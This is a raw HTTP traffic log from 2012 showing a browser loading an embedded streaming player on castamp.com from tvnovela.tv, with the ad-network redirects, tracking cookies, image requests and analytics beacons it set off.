Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx
Date: Fri, 09 Nov 2012 12:41:52 GMT
Content-Length: 443
Last-Modified: Fri, 25 May 2012 16:26:53 GMT
Connection: close
Etag: &quot;4fbfb2cd-1bb&quot;
Accept-Ranges: bytes
GET /adstract/scripts/smart/smart.js HTTP/1.1

Host: cdn.adk2.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/300x250.html?943540167
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 376
Connection: keep-alive
x-amz-id-2: /uUYBYkjjusnAntOi6mBQjGsPP8D9BUO0m25tdc6UciUgKjcxAke//HXPGm4RTAp
x-amz-request-id: C444209577AF3D69
Date: Wed, 07 Nov 2012 12:55:27 GMT
Cache-Control: public, max-age=60, s-maxage=60
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 12:40:29 GMT
Etag: &quot;20d29ec3201e14a713272f6994b9bf8c&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 2641
X-Amz-Cf-Id: 5JvkSkOs7ZjDyygYlTPz3OkxdfbUT3FYt9hXXv0oXR9rSMY6nI66mw==
Via: 1.0 a0ad14606e58633886c08b443a00ec16.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Wed, 07 Nov 2012 20:35:02 GMT
Expires: Thu, 07 Nov 2013 20:35:02 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 144268
GET /st?ad_type=ad&ad_size=800x440&section=3488682&position=btf&t_url=http://www.tvnovela.tv/televisa-en-vivo.html HTTP/1.1

Host: ts.smowtion.com
GET /st?ad_type=ad&amp;ad_size=800x440&amp;section=3488682&amp;position=btf&amp;t_url=http://www.tvnovela.tv/televisa-en-vivo.html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0, no-cache
Date: Fri, 09 Nov 2012 12:39:30 GMT
Location: http://ad.yieldmanager.com/st?ad_type=ad&amp;ad_size=800x440&amp;section=3488682&amp;position=btf&amp;t_url=http://www.tvnovela.tv/televisa-en-vivo.html&amp;suid=98aeaa9a-aaaa-41ff-a5f0-30fc83701a29
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR NID&quot;
Server: nginx
Set-Cookie: suid=&quot;eyJ2ZXJzaW9uIjogIjAuMSIsICJ2YWx1ZSI6ICI5OGFlYWE5YS1hYWFhLTQxZmYtYTVmMC0zMGZjODM3MDFhMjkifQ==&quot;; expires=Sat, 09 Nov 2013 12:39:30 GMT; Path=/
Content-Length: 0
Connection: keep-alive
GET /2j63j1k.png HTTP/1.1

Host: i46.tinypic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: image/png
Server: Apache
Last-Modified: Tue, 02 Oct 2012 19:32:49 GMT
Etag: &quot;e08-4cb18965e3f53&quot;
Cache-Control: max-age=21600
Expires: Fri, 09 Nov 2012 13:36:03 GMT
Content-Length: 3592
Accept-Ranges: bytes
Date: Fri, 09 Nov 2012 12:39:30 GMT
X-Varnish: 3785757669 3782727225
Age: 18208
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Server: den2tpv08
X-Cache: HIT
GET /st?ad_type=iframe&ad_size=300x250&site=991315&section_code=3718825 HTTP/1.1

Host: ad.yieldmanager.com
GET /st?ad_type=iframe&amp;ad_size=300x250&amp;site=991315&amp;section_code=3718825 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Fri, 09 Nov 2012 12:39:30 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor1184.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:30 GMT
Expires: Fri, 09 Nov 2012 12:39:30 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /script/java.php?option=rotateur&rotateur=44011 HTTP/1.1

Host: www.adcash.com
GET /script/java.php?option=rotateur&amp;rotateur=44011 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Server: 418
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Date: Fri, 09 Nov 2012 12:39:31 GMT
Location: http://www.adcash.com/script/packcpm.php?r=44011&amp;data=
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: keep-alive
X-Robots-Tag: noindex
Content-Length: 0
GET /player.html?a=6581207&size=300x250&ci=1&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r= HTTP/1.1

Host: ads.adk2.com
GET /player.html?a=6581207&amp;size=300x250&amp;ci=1&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/300x250.html?943540167
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Set-Cookie: tuuid=8e586b72-1c3e-4603-9b70-59577d512183; path=/; expires=Sun, 09-Nov-2014 12:39:31 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: /player.html?ul_cb=1&amp;a=6581207&amp;size=300x250&amp;ci=1&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Fri, 09 Nov 2012 12:39:31 GMT
GET /imp?Z=300x250&S=3718825&i=991315&T=3&_salt=2189805042&B=10&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r=0 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=300x250&amp;S=3718825&amp;i=991315&amp;T=3&amp;_salt=2189805042&amp;B=10&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=300x250&amp;site=991315&amp;section_code=3718825
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Fri, 09 Nov 2012 12:39:31 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0754.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=165c4bemu/*http%3A//ad.yieldmanager.com/imp?Z=300x250&amp;S=3718825&amp;i=991315&amp;T=3&amp;_salt=2189805042&amp;B=10&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=0
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:31 GMT
Expires: Fri, 09 Nov 2012 12:39:31 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /js/jwplayer.js HTTP/1.1

Host: www.castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx
Date: Fri, 09 Nov 2012 12:41:52 GMT
Content-Length: 140572
Last-Modified: Thu, 16 Aug 2012 21:52:21 GMT
Connection: close
Etag: &quot;502d6b95-2251c&quot;
Accept-Ranges: bytes
GET /player.html?ul_cb=1&a=6581207&size=300x250&ci=1&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r= HTTP/1.1

Host: ads.adk2.com
GET /player.html?ul_cb=1&amp;a=6581207&amp;size=300x250&amp;ci=1&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/300x250.html?943540167
Cookie: tuuid=8e586b72-1c3e-4603-9b70-59577d512183
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: tuuid=8e586b72-1c3e-4603-9b70-59577d512183; path=/; expires=Sun, 09-Nov-2014 12:39:31 GMT
ih=!8548132,1352464771; path=/; expires=Sun, 09-Nov-2014 12:39:31 GMT
fh=!8548132,1; path=/; expires=Sat, 10-Nov-2012 00:00:00 GMT
icah1=!8548132,1,121707571; path=/; expires=Sun, 09-Nov-2014 12:39:31 GMT
imh1=!8469015,1,121707571; path=/; expires=Sun, 09-Nov-2014 12:39:31 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 1329
Date: Fri, 09 Nov 2012 12:39:31 GMT
GET /script/packcpm.php?r=44011&data= HTTP/1.1

Host: www.adcash.com
GET /script/packcpm.php?r=44011&amp;data= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Server: 417
Date: Fri, 09 Nov 2012 12:39:31 GMT
Content-Length: 1192
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Pragma: no-cache
X-Robots-Tag: noindex
Content-Encoding: gzip
GET /adstract/files/8488019/8488019 HTTP/1.1

Host: cdn.adk2.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ads.adk2.com/player.html?ul_cb=1&amp;a=6581207&amp;size=300x250&amp;ci=1&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=
HTTP/1.0 200 OK

Content-Type: image/gif
Content-Length: 10095
Connection: keep-alive
x-amz-id-2: zNsWzQYzaJ/Zg2CNA6vX5AmohfwZER4ci+uykaIBJxzQJuBo4ncSuONTjUy4enLA
x-amz-request-id: 04F7ABDC22DAF0DF
Date: Thu, 18 Oct 2012 22:14:24 GMT
Cache-Control: public, max-age=15552000, s-maxage=15552000
Last-Modified: Tue, 17 Jul 2012 15:27:05 GMT
Etag: &quot;a7c419cf8765831e7f08878508323ecc&quot;
Accept-Ranges: bytes
Server: AmazonS3
Age: 1866308
X-Amz-Cf-Id: yxOfkAu5d19EY4Tg3pTkRR8hEN_Bapg07In0h0HV1xlAmJWnKI6Bdw==
Via: 1.0 a0ad14606e58633886c08b443a00ec16.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /st?ad_type=ad&ad_size=800x440&section=3488682&position=btf&t_url=http://www.tvnovela.tv/televisa-en-vivo.html&suid=98aeaa9a-aaaa-41ff-a5f0-30fc83701a29 HTTP/1.1

Host: ad.yieldmanager.com
GET /st?ad_type=ad&amp;ad_size=800x440&amp;section=3488682&amp;position=btf&amp;t_url=http://www.tvnovela.tv/televisa-en-vivo.html&amp;suid=98aeaa9a-aaaa-41ff-a5f0-30fc83701a29 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Fri, 09 Nov 2012 12:39:31 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0514.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:31 GMT
Expires: Fri, 09 Nov 2012 12:39:31 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /468x60-2.html?526770425 HTTP/1.1

Host: www.castamp.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx
Date: Fri, 09 Nov 2012 12:41:53 GMT
Content-Length: 558
Last-Modified: Fri, 17 Aug 2012 13:56:31 GMT
Connection: close
Etag: &quot;502e4d8f-22e&quot;
Accept-Ranges: bytes
GET /nlr1fk.png HTTP/1.1

Host: i43.tinypic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 09 Nov 2012 12:39:31 GMT
Expires: Fri, 09 Nov 2012 15:56:19 GMT
Last-Modified: Wed, 09 Nov 2011 06:31:23 GMT
Cache-Control: max-age=21600
Etag: &quot;ae8-4b1476fc7c4c0&quot;
Accept-Ranges: bytes
Server: Apache
X-Cache: HIT
X-Varnish: 3444877613 3438839146
X-Varnish-Server: den2tpv05
Content-Length: 2792
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Fri, 09 Nov 2012 08:35:01 GMT
Expires: Fri, 09 Nov 2012 20:35:01 GMT
Vary: Accept-Encoding
Age: 14670
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /v2/cexposer/SIG=165c4bemu/*http%3A//ad.yieldmanager.com/imp?Z=300x250&S=3718825&i=991315&T=3&_salt=2189805042&B=10&u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&r=0 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=165c4bemu/*http%3A//ad.yieldmanager.com/imp?Z=300x250&amp;S=3718825&amp;i=991315&amp;T=3&amp;_salt=2189805042&amp;B=10&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=300x250&amp;site=991315&amp;section_code=3718825
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Fri, 09 Nov 2012 12:39:31 GMT
Set-Cookie: B=clhp0pd89puc3&amp;b=3&amp;s=vm; expires=Tue, 10-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?Z=300x250&amp;S=3718825&amp;i=991315&amp;T=3&amp;_salt=2189805042&amp;B=10&amp;u=http%3A%2F%2Fwww.castamp.com%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;r=0&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /st?ad_type=pop&ad_size=0x0&site=991315&section_code=INSERT_SECTION_CODE_HERE&banned_pop_types=28&pop_times=1&pop_frequency=86400 HTTP/1.1

Host: ad.yieldmanager.com
GET /st?ad_type=pop&amp;ad_size=0x0&amp;site=991315&amp;section_code=INSERT_SECTION_CODE_HERE&amp;banned_pop_types=28&amp;pop_times=1&amp;pop_frequency=86400 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Fri, 09 Nov 2012 12:39:31 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor1375.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:31 GMT
Expires: Fri, 09 Nov 2012 12:39:31 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /static/flash/player5.9.swf HTTP/1.1

Host: www.udemy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Apache
Last-Modified: Fri, 09 Nov 2012 01:49:22 GMT
Accept-Ranges: bytes
Content-Length: 114942
Cache-Control: max-age=0
Expires: Fri, 09 Nov 2012 08:56:21 GMT
Date: Fri, 09 Nov 2012 12:39:31 GMT
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=959899400&utmhn=www.castamp.com&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=584x470&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=CastAMP.com%20Player&utmhid=186813307&utmr=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&utmp=%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&utmac=UA-20316775-1&utmcc=__utma%3D109905047.2081951700.1352464772.1352464772.1352464772.1%3B%2B__utmz%3D109905047.1352464772.1.1.utmcsr%3Dtvnovela.tv%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Ftelevisa-en-vivo.html%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=959899400&amp;utmhn=www.castamp.com&amp;utmcs=ISO-8859-1&amp;utmsr=1176x885&amp;utmvp=584x470&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=CastAMP.com%20Player&amp;utmhid=186813307&amp;utmr=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;utmp=%2Fembed.php%3Fc%3Dlopezdd%26tk%3DNbPNrVie%26vwidth%3D608%26vheight%3D470&amp;utmac=UA-20316775-1&amp;utmcc=__utma%3D109905047.2081951700.1352464772.1352464772.1352464772.1%3B%2B__utmz%3D109905047.1352464772.1.1.utmcsr%3Dtvnovela.tv%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Ftelevisa-en-vivo.html%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 20:51:06 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 143306
Server: GFE/2.0
GET /imp?Z=800x440&position=btf&s=3488682&suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&_salt=2845216435&B=10&u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&r=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=800x440&amp;position=btf&amp;s=3488682&amp;suid=98aeaa9a%2daaaa%2d41ff%2da5f0%2d30fc83701a29&amp;t_url=http%3a%2f%2fwww.tvnovela.tv%2ftelevisa%2den%2dvivo.html&amp;_salt=2845216435&amp;B=10&amp;u=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;r=1 HTTP/1.1

